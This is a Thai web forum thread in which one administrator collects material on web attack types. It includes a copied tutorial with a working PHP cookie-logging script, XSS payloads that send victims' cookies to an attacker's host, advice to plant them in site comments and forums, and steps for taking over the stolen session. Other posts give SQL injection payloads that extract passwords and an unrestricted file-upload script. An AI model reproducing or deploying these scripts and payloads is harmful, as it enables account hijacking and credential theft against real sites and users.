Author Topic: รูปแบบการโจมตีต่างๆ กับเว็บ  (Read 12201 times)

golfreeze

  • Administrator
  • Hero Member
  • *****
  • Posts: 2145
    • View Profile
    • นั่งสมาธิ สติปัฏฐานสี่ พาเที่ยววัด แนะนำวัด แจกcd ธรรมะฟรี
    • Email
รูปแบบการโจมตีต่างๆ กับเว็บ
« on: สิงหาคม 05, 2014, 01:56:12 PM »
##เกี่ยวกับ javascript injection
http://www.thisislegal.com/tutorials/7

golfreeze

  • Administrator
  • Hero Member
  • *****
  • Posts: 2145
    • View Profile
    • นั่งสมาธิ สติปัฏฐานสี่ พาเที่ยววัด แนะนำวัด แจกcd ธรรมะฟรี
    • Email
Re: รูปแบบการโจมตีต่างๆ กับเว็บ
« Reply #1 on: สิงหาคม 05, 2014, 01:56:41 PM »
In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:
<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?>

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
</script>

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;

<img src="URL OF THE IMAGE"/></a>

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

Don't forget to comment if you like my post.


special thank to : http://hackiteasy.blogspot.com/2011/01/session-hijacking-or-cookie-stealing.html

golfreeze

  • Administrator
  • Hero Member
  • *****
  • Posts: 2145
    • View Profile
    • นั่งสมาธิ สติปัฏฐานสี่ พาเที่ยววัด แนะนำวัด แจกcd ธรรมะฟรี
    • Email
Re: รูปแบบการโจมตีต่างๆ กับเว็บ
« Reply #2 on: สิงหาคม 05, 2014, 02:04:52 PM »
SQL injection

http://www.unixwiz.net/techtips/sql-injection.html

golf' OR 'x'='x

SELECT email, passwd, login_id, full_name
  FROM members
 WHERE email = 'x';
      UPDATE members
      SET email = 'steve@unixwiz.net'
      WHERE email = 'bob@example.com';
« Last Edit: สิงหาคม 05, 2014, 03:10:37 PM by golfreeze »

golfreeze

  • Administrator
  • Hero Member
  • *****
  • Posts: 2145
    • View Profile
    • นั่งสมาธิ สติปัฏฐานสี่ พาเที่ยววัด แนะนำวัด แจกcd ธรรมะฟรี
    • Email
Re: รูปแบบการโจมตีต่างๆ กับเว็บ
« Reply #3 on: สิงหาคม 15, 2014, 10:46:56 AM »
Exploiting SQL Injections in Insert Statement, is not trivial as most of the times you do not directly see the output of the injected query.

Unlike MS-SQL, mysql 'generally' do not support use of multiple queries which is a common trick of exploiting SQL Injections when backend database is MS-SQL.

—————————————————-

Example 1

Lets consider a vulnerable example, the injection point being $id (integer field) in the following statement:-

insert into secret values($id, 'Welcome');

———————————————————– —–

Exploit

insert into secret values(1000, (select passwd from users where id=1))#, 'Welcome');

'#' comments out the rest of the query.

——————————————————————

Example 2  Blind Injection

scenario:- injection is in last column of the query and is an integer field, hence an attacker can not directly select a password in an integer field

Query:- insert into secret values('WELCOME', $id);

EXPLOIT:-

insert into secret values('WELCOME', (select if (passwd ='mypass',1,0) from users where id=1))#);

————————————————————————–

golfreeze

  • Administrator
  • Hero Member
  • *****
  • Posts: 2145
    • View Profile
    • นั่งสมาธิ สติปัฏฐานสี่ พาเที่ยววัด แนะนำวัด แจกcd ธรรมะฟรี
    • Email
Re: รูปแบบการโจมตีต่างๆ กับเว็บ
« Reply #4 on: สิงหาคม 18, 2014, 03:15:59 PM »
<html><body>
<form enctype="multipart/form-data" action="uploads.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>

The PHP is then:

<?php
$target_path = "uploads/";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file ".  basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
?>

Is there any possible way to send a file via this technique using curl from the command line or a shell script? i.e something along the lines of:

curl -F "uploadedfile=@/path/to/my/file" http://mywebserver.com/uploads.php